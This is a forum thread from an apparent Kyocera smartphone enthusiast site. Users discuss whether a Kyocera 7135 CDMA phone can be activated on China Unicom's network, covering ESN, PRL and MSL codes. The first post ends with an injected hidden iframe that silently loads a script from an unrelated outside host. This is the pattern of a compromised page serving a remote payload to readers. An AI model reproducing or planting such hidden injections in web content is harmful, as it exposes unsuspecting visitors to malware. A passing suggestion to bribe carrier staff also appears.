+ Reply to Thread
Page 1 of 2 1 2 LastLast

May I buy 7135 and setup it at China Unicom Service?

China Unicom network is CHINA£ºIS95A£¬1X £¨800MHz£©, I find it's same as the state. if it can work on China Unicom network, what information I should get from Kyocera and provide to China Unicom, So that they may regisiter it into their network. One morequestion: Does China Unicom people have to disassemble the cover of 7135 and recover it after they finish the setting , if so, that's no good, I'm afraid that it will effect it's quality.
    thanks for any information about it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mike, does the 6035 work on China Unicom? Are you aware of any other CDMA phones supported by Verizon that also work on China Unicom?

Originally posted by jazmaan
    Mike, does the 6035 work on China Unicom? Are you aware of any other CDMA phones supported by Verizon that also work on China Unicom?
    I don't know, but I know our CDMA mobile phone may work directly in South Korea's network without any changing and setting.
    thank Jazmaan!

From China Unicom's website, looks like they're GSM. In that case you're out of luck in regards to the 7135.

He said they had an IS95 system, which is CDMA (I think). They may have changed.
    ---------------
    The same thing we do every night, Pinky...

Originally posted by badkarma
    From China Unicom's website, looks like they're GSM. In that case you're out of luck in regards to the 7135.
    please go to http://cdma.cnuninet.com/

China Unicom do have a GSM network (about 30 million users), but They hava a new CDMA network which already have 7 million users, they plan to increase this QTY to 20 Million before the end of his year. Right now,they are working on the network update from CDMA IS95A to 1x , and it will be finished in March.
    thanks

Originally posted by mikechou
    please go to http://cdma.cnuninet.com/

China Unicom do have a GSM network (about 30 million users), but They hava a new CDMA network which already have 7 million users, they plan to increase this QTY to 20 Million before the end of his year. Right now,they are working on the network update from CDMA IS95A to 1x , and it will be finished in March.
    thanks
    I was browsing through some of the handset phones available on their CDMA network and I've never seen any of them in North America. I suspect that China Unicom is using a different frequency band than we are. In that case you're out of luck to. But if you really want to be certain, ask them if they will activate a CDMA 1900/900 phone on their network.

Originally posted by badkarma
    I was browsing through some of the handset phones available on their CDMA network and I've never seen any of them in North America. I suspect that China Unicom is using a different frequency band than we are. In that case you're out of luck to. But if you really want to be certain, ask them if they will activate a CDMA 1900/900 phone on their network.
    Learnt from http://www.wapsight.com/info/2002/06/24/192702.html
    The Kyocera 7135 is a trimode Code Division Multiple Access (CDMA) digital wireless phone, operating on CDMA PCS (1900 MHz), CDMA cellular (800 MHz) and analog cellular networks.

and know from http://www.cdg.org/worldwide/index.asp

China Unicom's network is CDMA IS95A/1x Cellular 800 MHz
    Alltel and Verizon is CDMA IS95A/1x Cellular 800 MHz or PCS1900

Is that enough to say the phone may works on CDMA IS95A/1x Cellular 800 MHz, will work on Alltel, Verizon, and China Unicom. if so, Kyocera 7135 does.

Please comments. thanks

Well from the info you posted, techincally it should be possible. You just need to see if China Unicom will add a foreign handset meanig will they register the ESN of that phone for you. The other problem you have, is the Preferred Roaming List which may be difficult to do. I've tried turning on my TELUS 6035 in New Zealand where there are CDMA carriers and I wouldn't get a signal, I'm guessing because that NZ carrier wasn't in my PRL. We used to be able to upload the PRL with the KWPST on the 6035, but from what I've heard from others on the forum, they weren't able to update the PRL on the 7135 with the current KWPST on the internet. I personally doubt you'd have trouble getting your phone's ESN added, or even getting someone from CU to give you the PRL in binary form on a diskette, if they don't I assume you can bribe someone . So you're going to have to find a way to update the PRL, and I doubt Over the Air Updates would work cuz you wouldn't even be able to get onto the network.

Mike,
    It's nice to have you in the forum. So you live in Mainland China then?
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Mike,
    It's nice to have you in the forum. So you live in Mainland China then?
    Mark, it's nice to know you here , yes, I'm in Suzhou, a city locates around Shanghai. and you?

I am in Minnesota here in the States. But we are honored to have members like yourself in all lands.
    ~'kito
    pdaPhoneHome Moderator

Mark, very glad to know you and this forum, Is that forum owned by Kyocera?

Nope, in no way is it connected to Kyocera.

We are just a bunch of fun loving geeks from all over who are obsessed with the Kyocera 6035 and 7135 smartphones and like to share what we have learned and keep learning.

I do believe that you are our first from China or even Asia.

Please make yourself at home.
    ~'kito
    pdaPhoneHome Moderator

I see, Let me join in from today, Hope you guy's information may help me to activate 7135 work on China Unicom network, I'm talking with Unicom guy on how to let it works, Where may I get the ENS (under battery?) and PRL update software? Beside the ESN and PRL, Unicom guy mentioned that their "Mini" need be inputted into cellular phone. but how to input? does anyone may figure it out?

BTW: what does this sentence "Please make yourself at home" mean? you know, my mother tone is not English, thanks.
    ---
    Mike Chou
    Mainland China

Administrator
    make yourself at home means get comfortable and relax... your amongst friends. there is a wealth of knowledge on this board. feel free to look around. perhaps you could share some of your language in our General DIscussion forum sometime...

the ESN is under the battery and the box. the PRL comes from the unicom folks. they do need the MSL to get into the phone in order to input the information to set the phone up on the network.

Originally posted by mikechou
    I see, Let me join in from today, Hope you guy's information may help me to activate 7135 work on China Unicom network, I'm talking with Unicom guy on how to let it works, Where may I get the ENS (under battery?) and PRL update software? Beside the ESN and PRL, Unicom guy mentioned that their "Mini" need be inputted into cellular phone. but how to input? does anyone may figure it out?

BTW: what does this sentence "Please make yourself at home" mean? you know, my mother tone is not English, thanks.
    Mike,

"Please make yourself at home" is basically saying welcome. Anyhow, the ESN is under the battery, the MSL, if purchased from Alltel is 00000 from what I hear. Getting the PRL into the phone may be a problem and I don't know what a "mini" is. Maybe he meant the phone number?

marctronixx and badkarma, Thank you for your help!
    Because of Chinese Lunar New Year Holiday, I can not talk China Unicom people through phone calling today, Maybe I may call them 10 days later.
    ---
    Mike Chou
    Mainland China

Gong Xi Fa Cai!

Xin Nien Kuai Le!

It's nice to have you hear on the boards Mike.... good luck getting a 7135 activated there! I hope it works!
    Please visit my picture site: Robert-O-Rama :)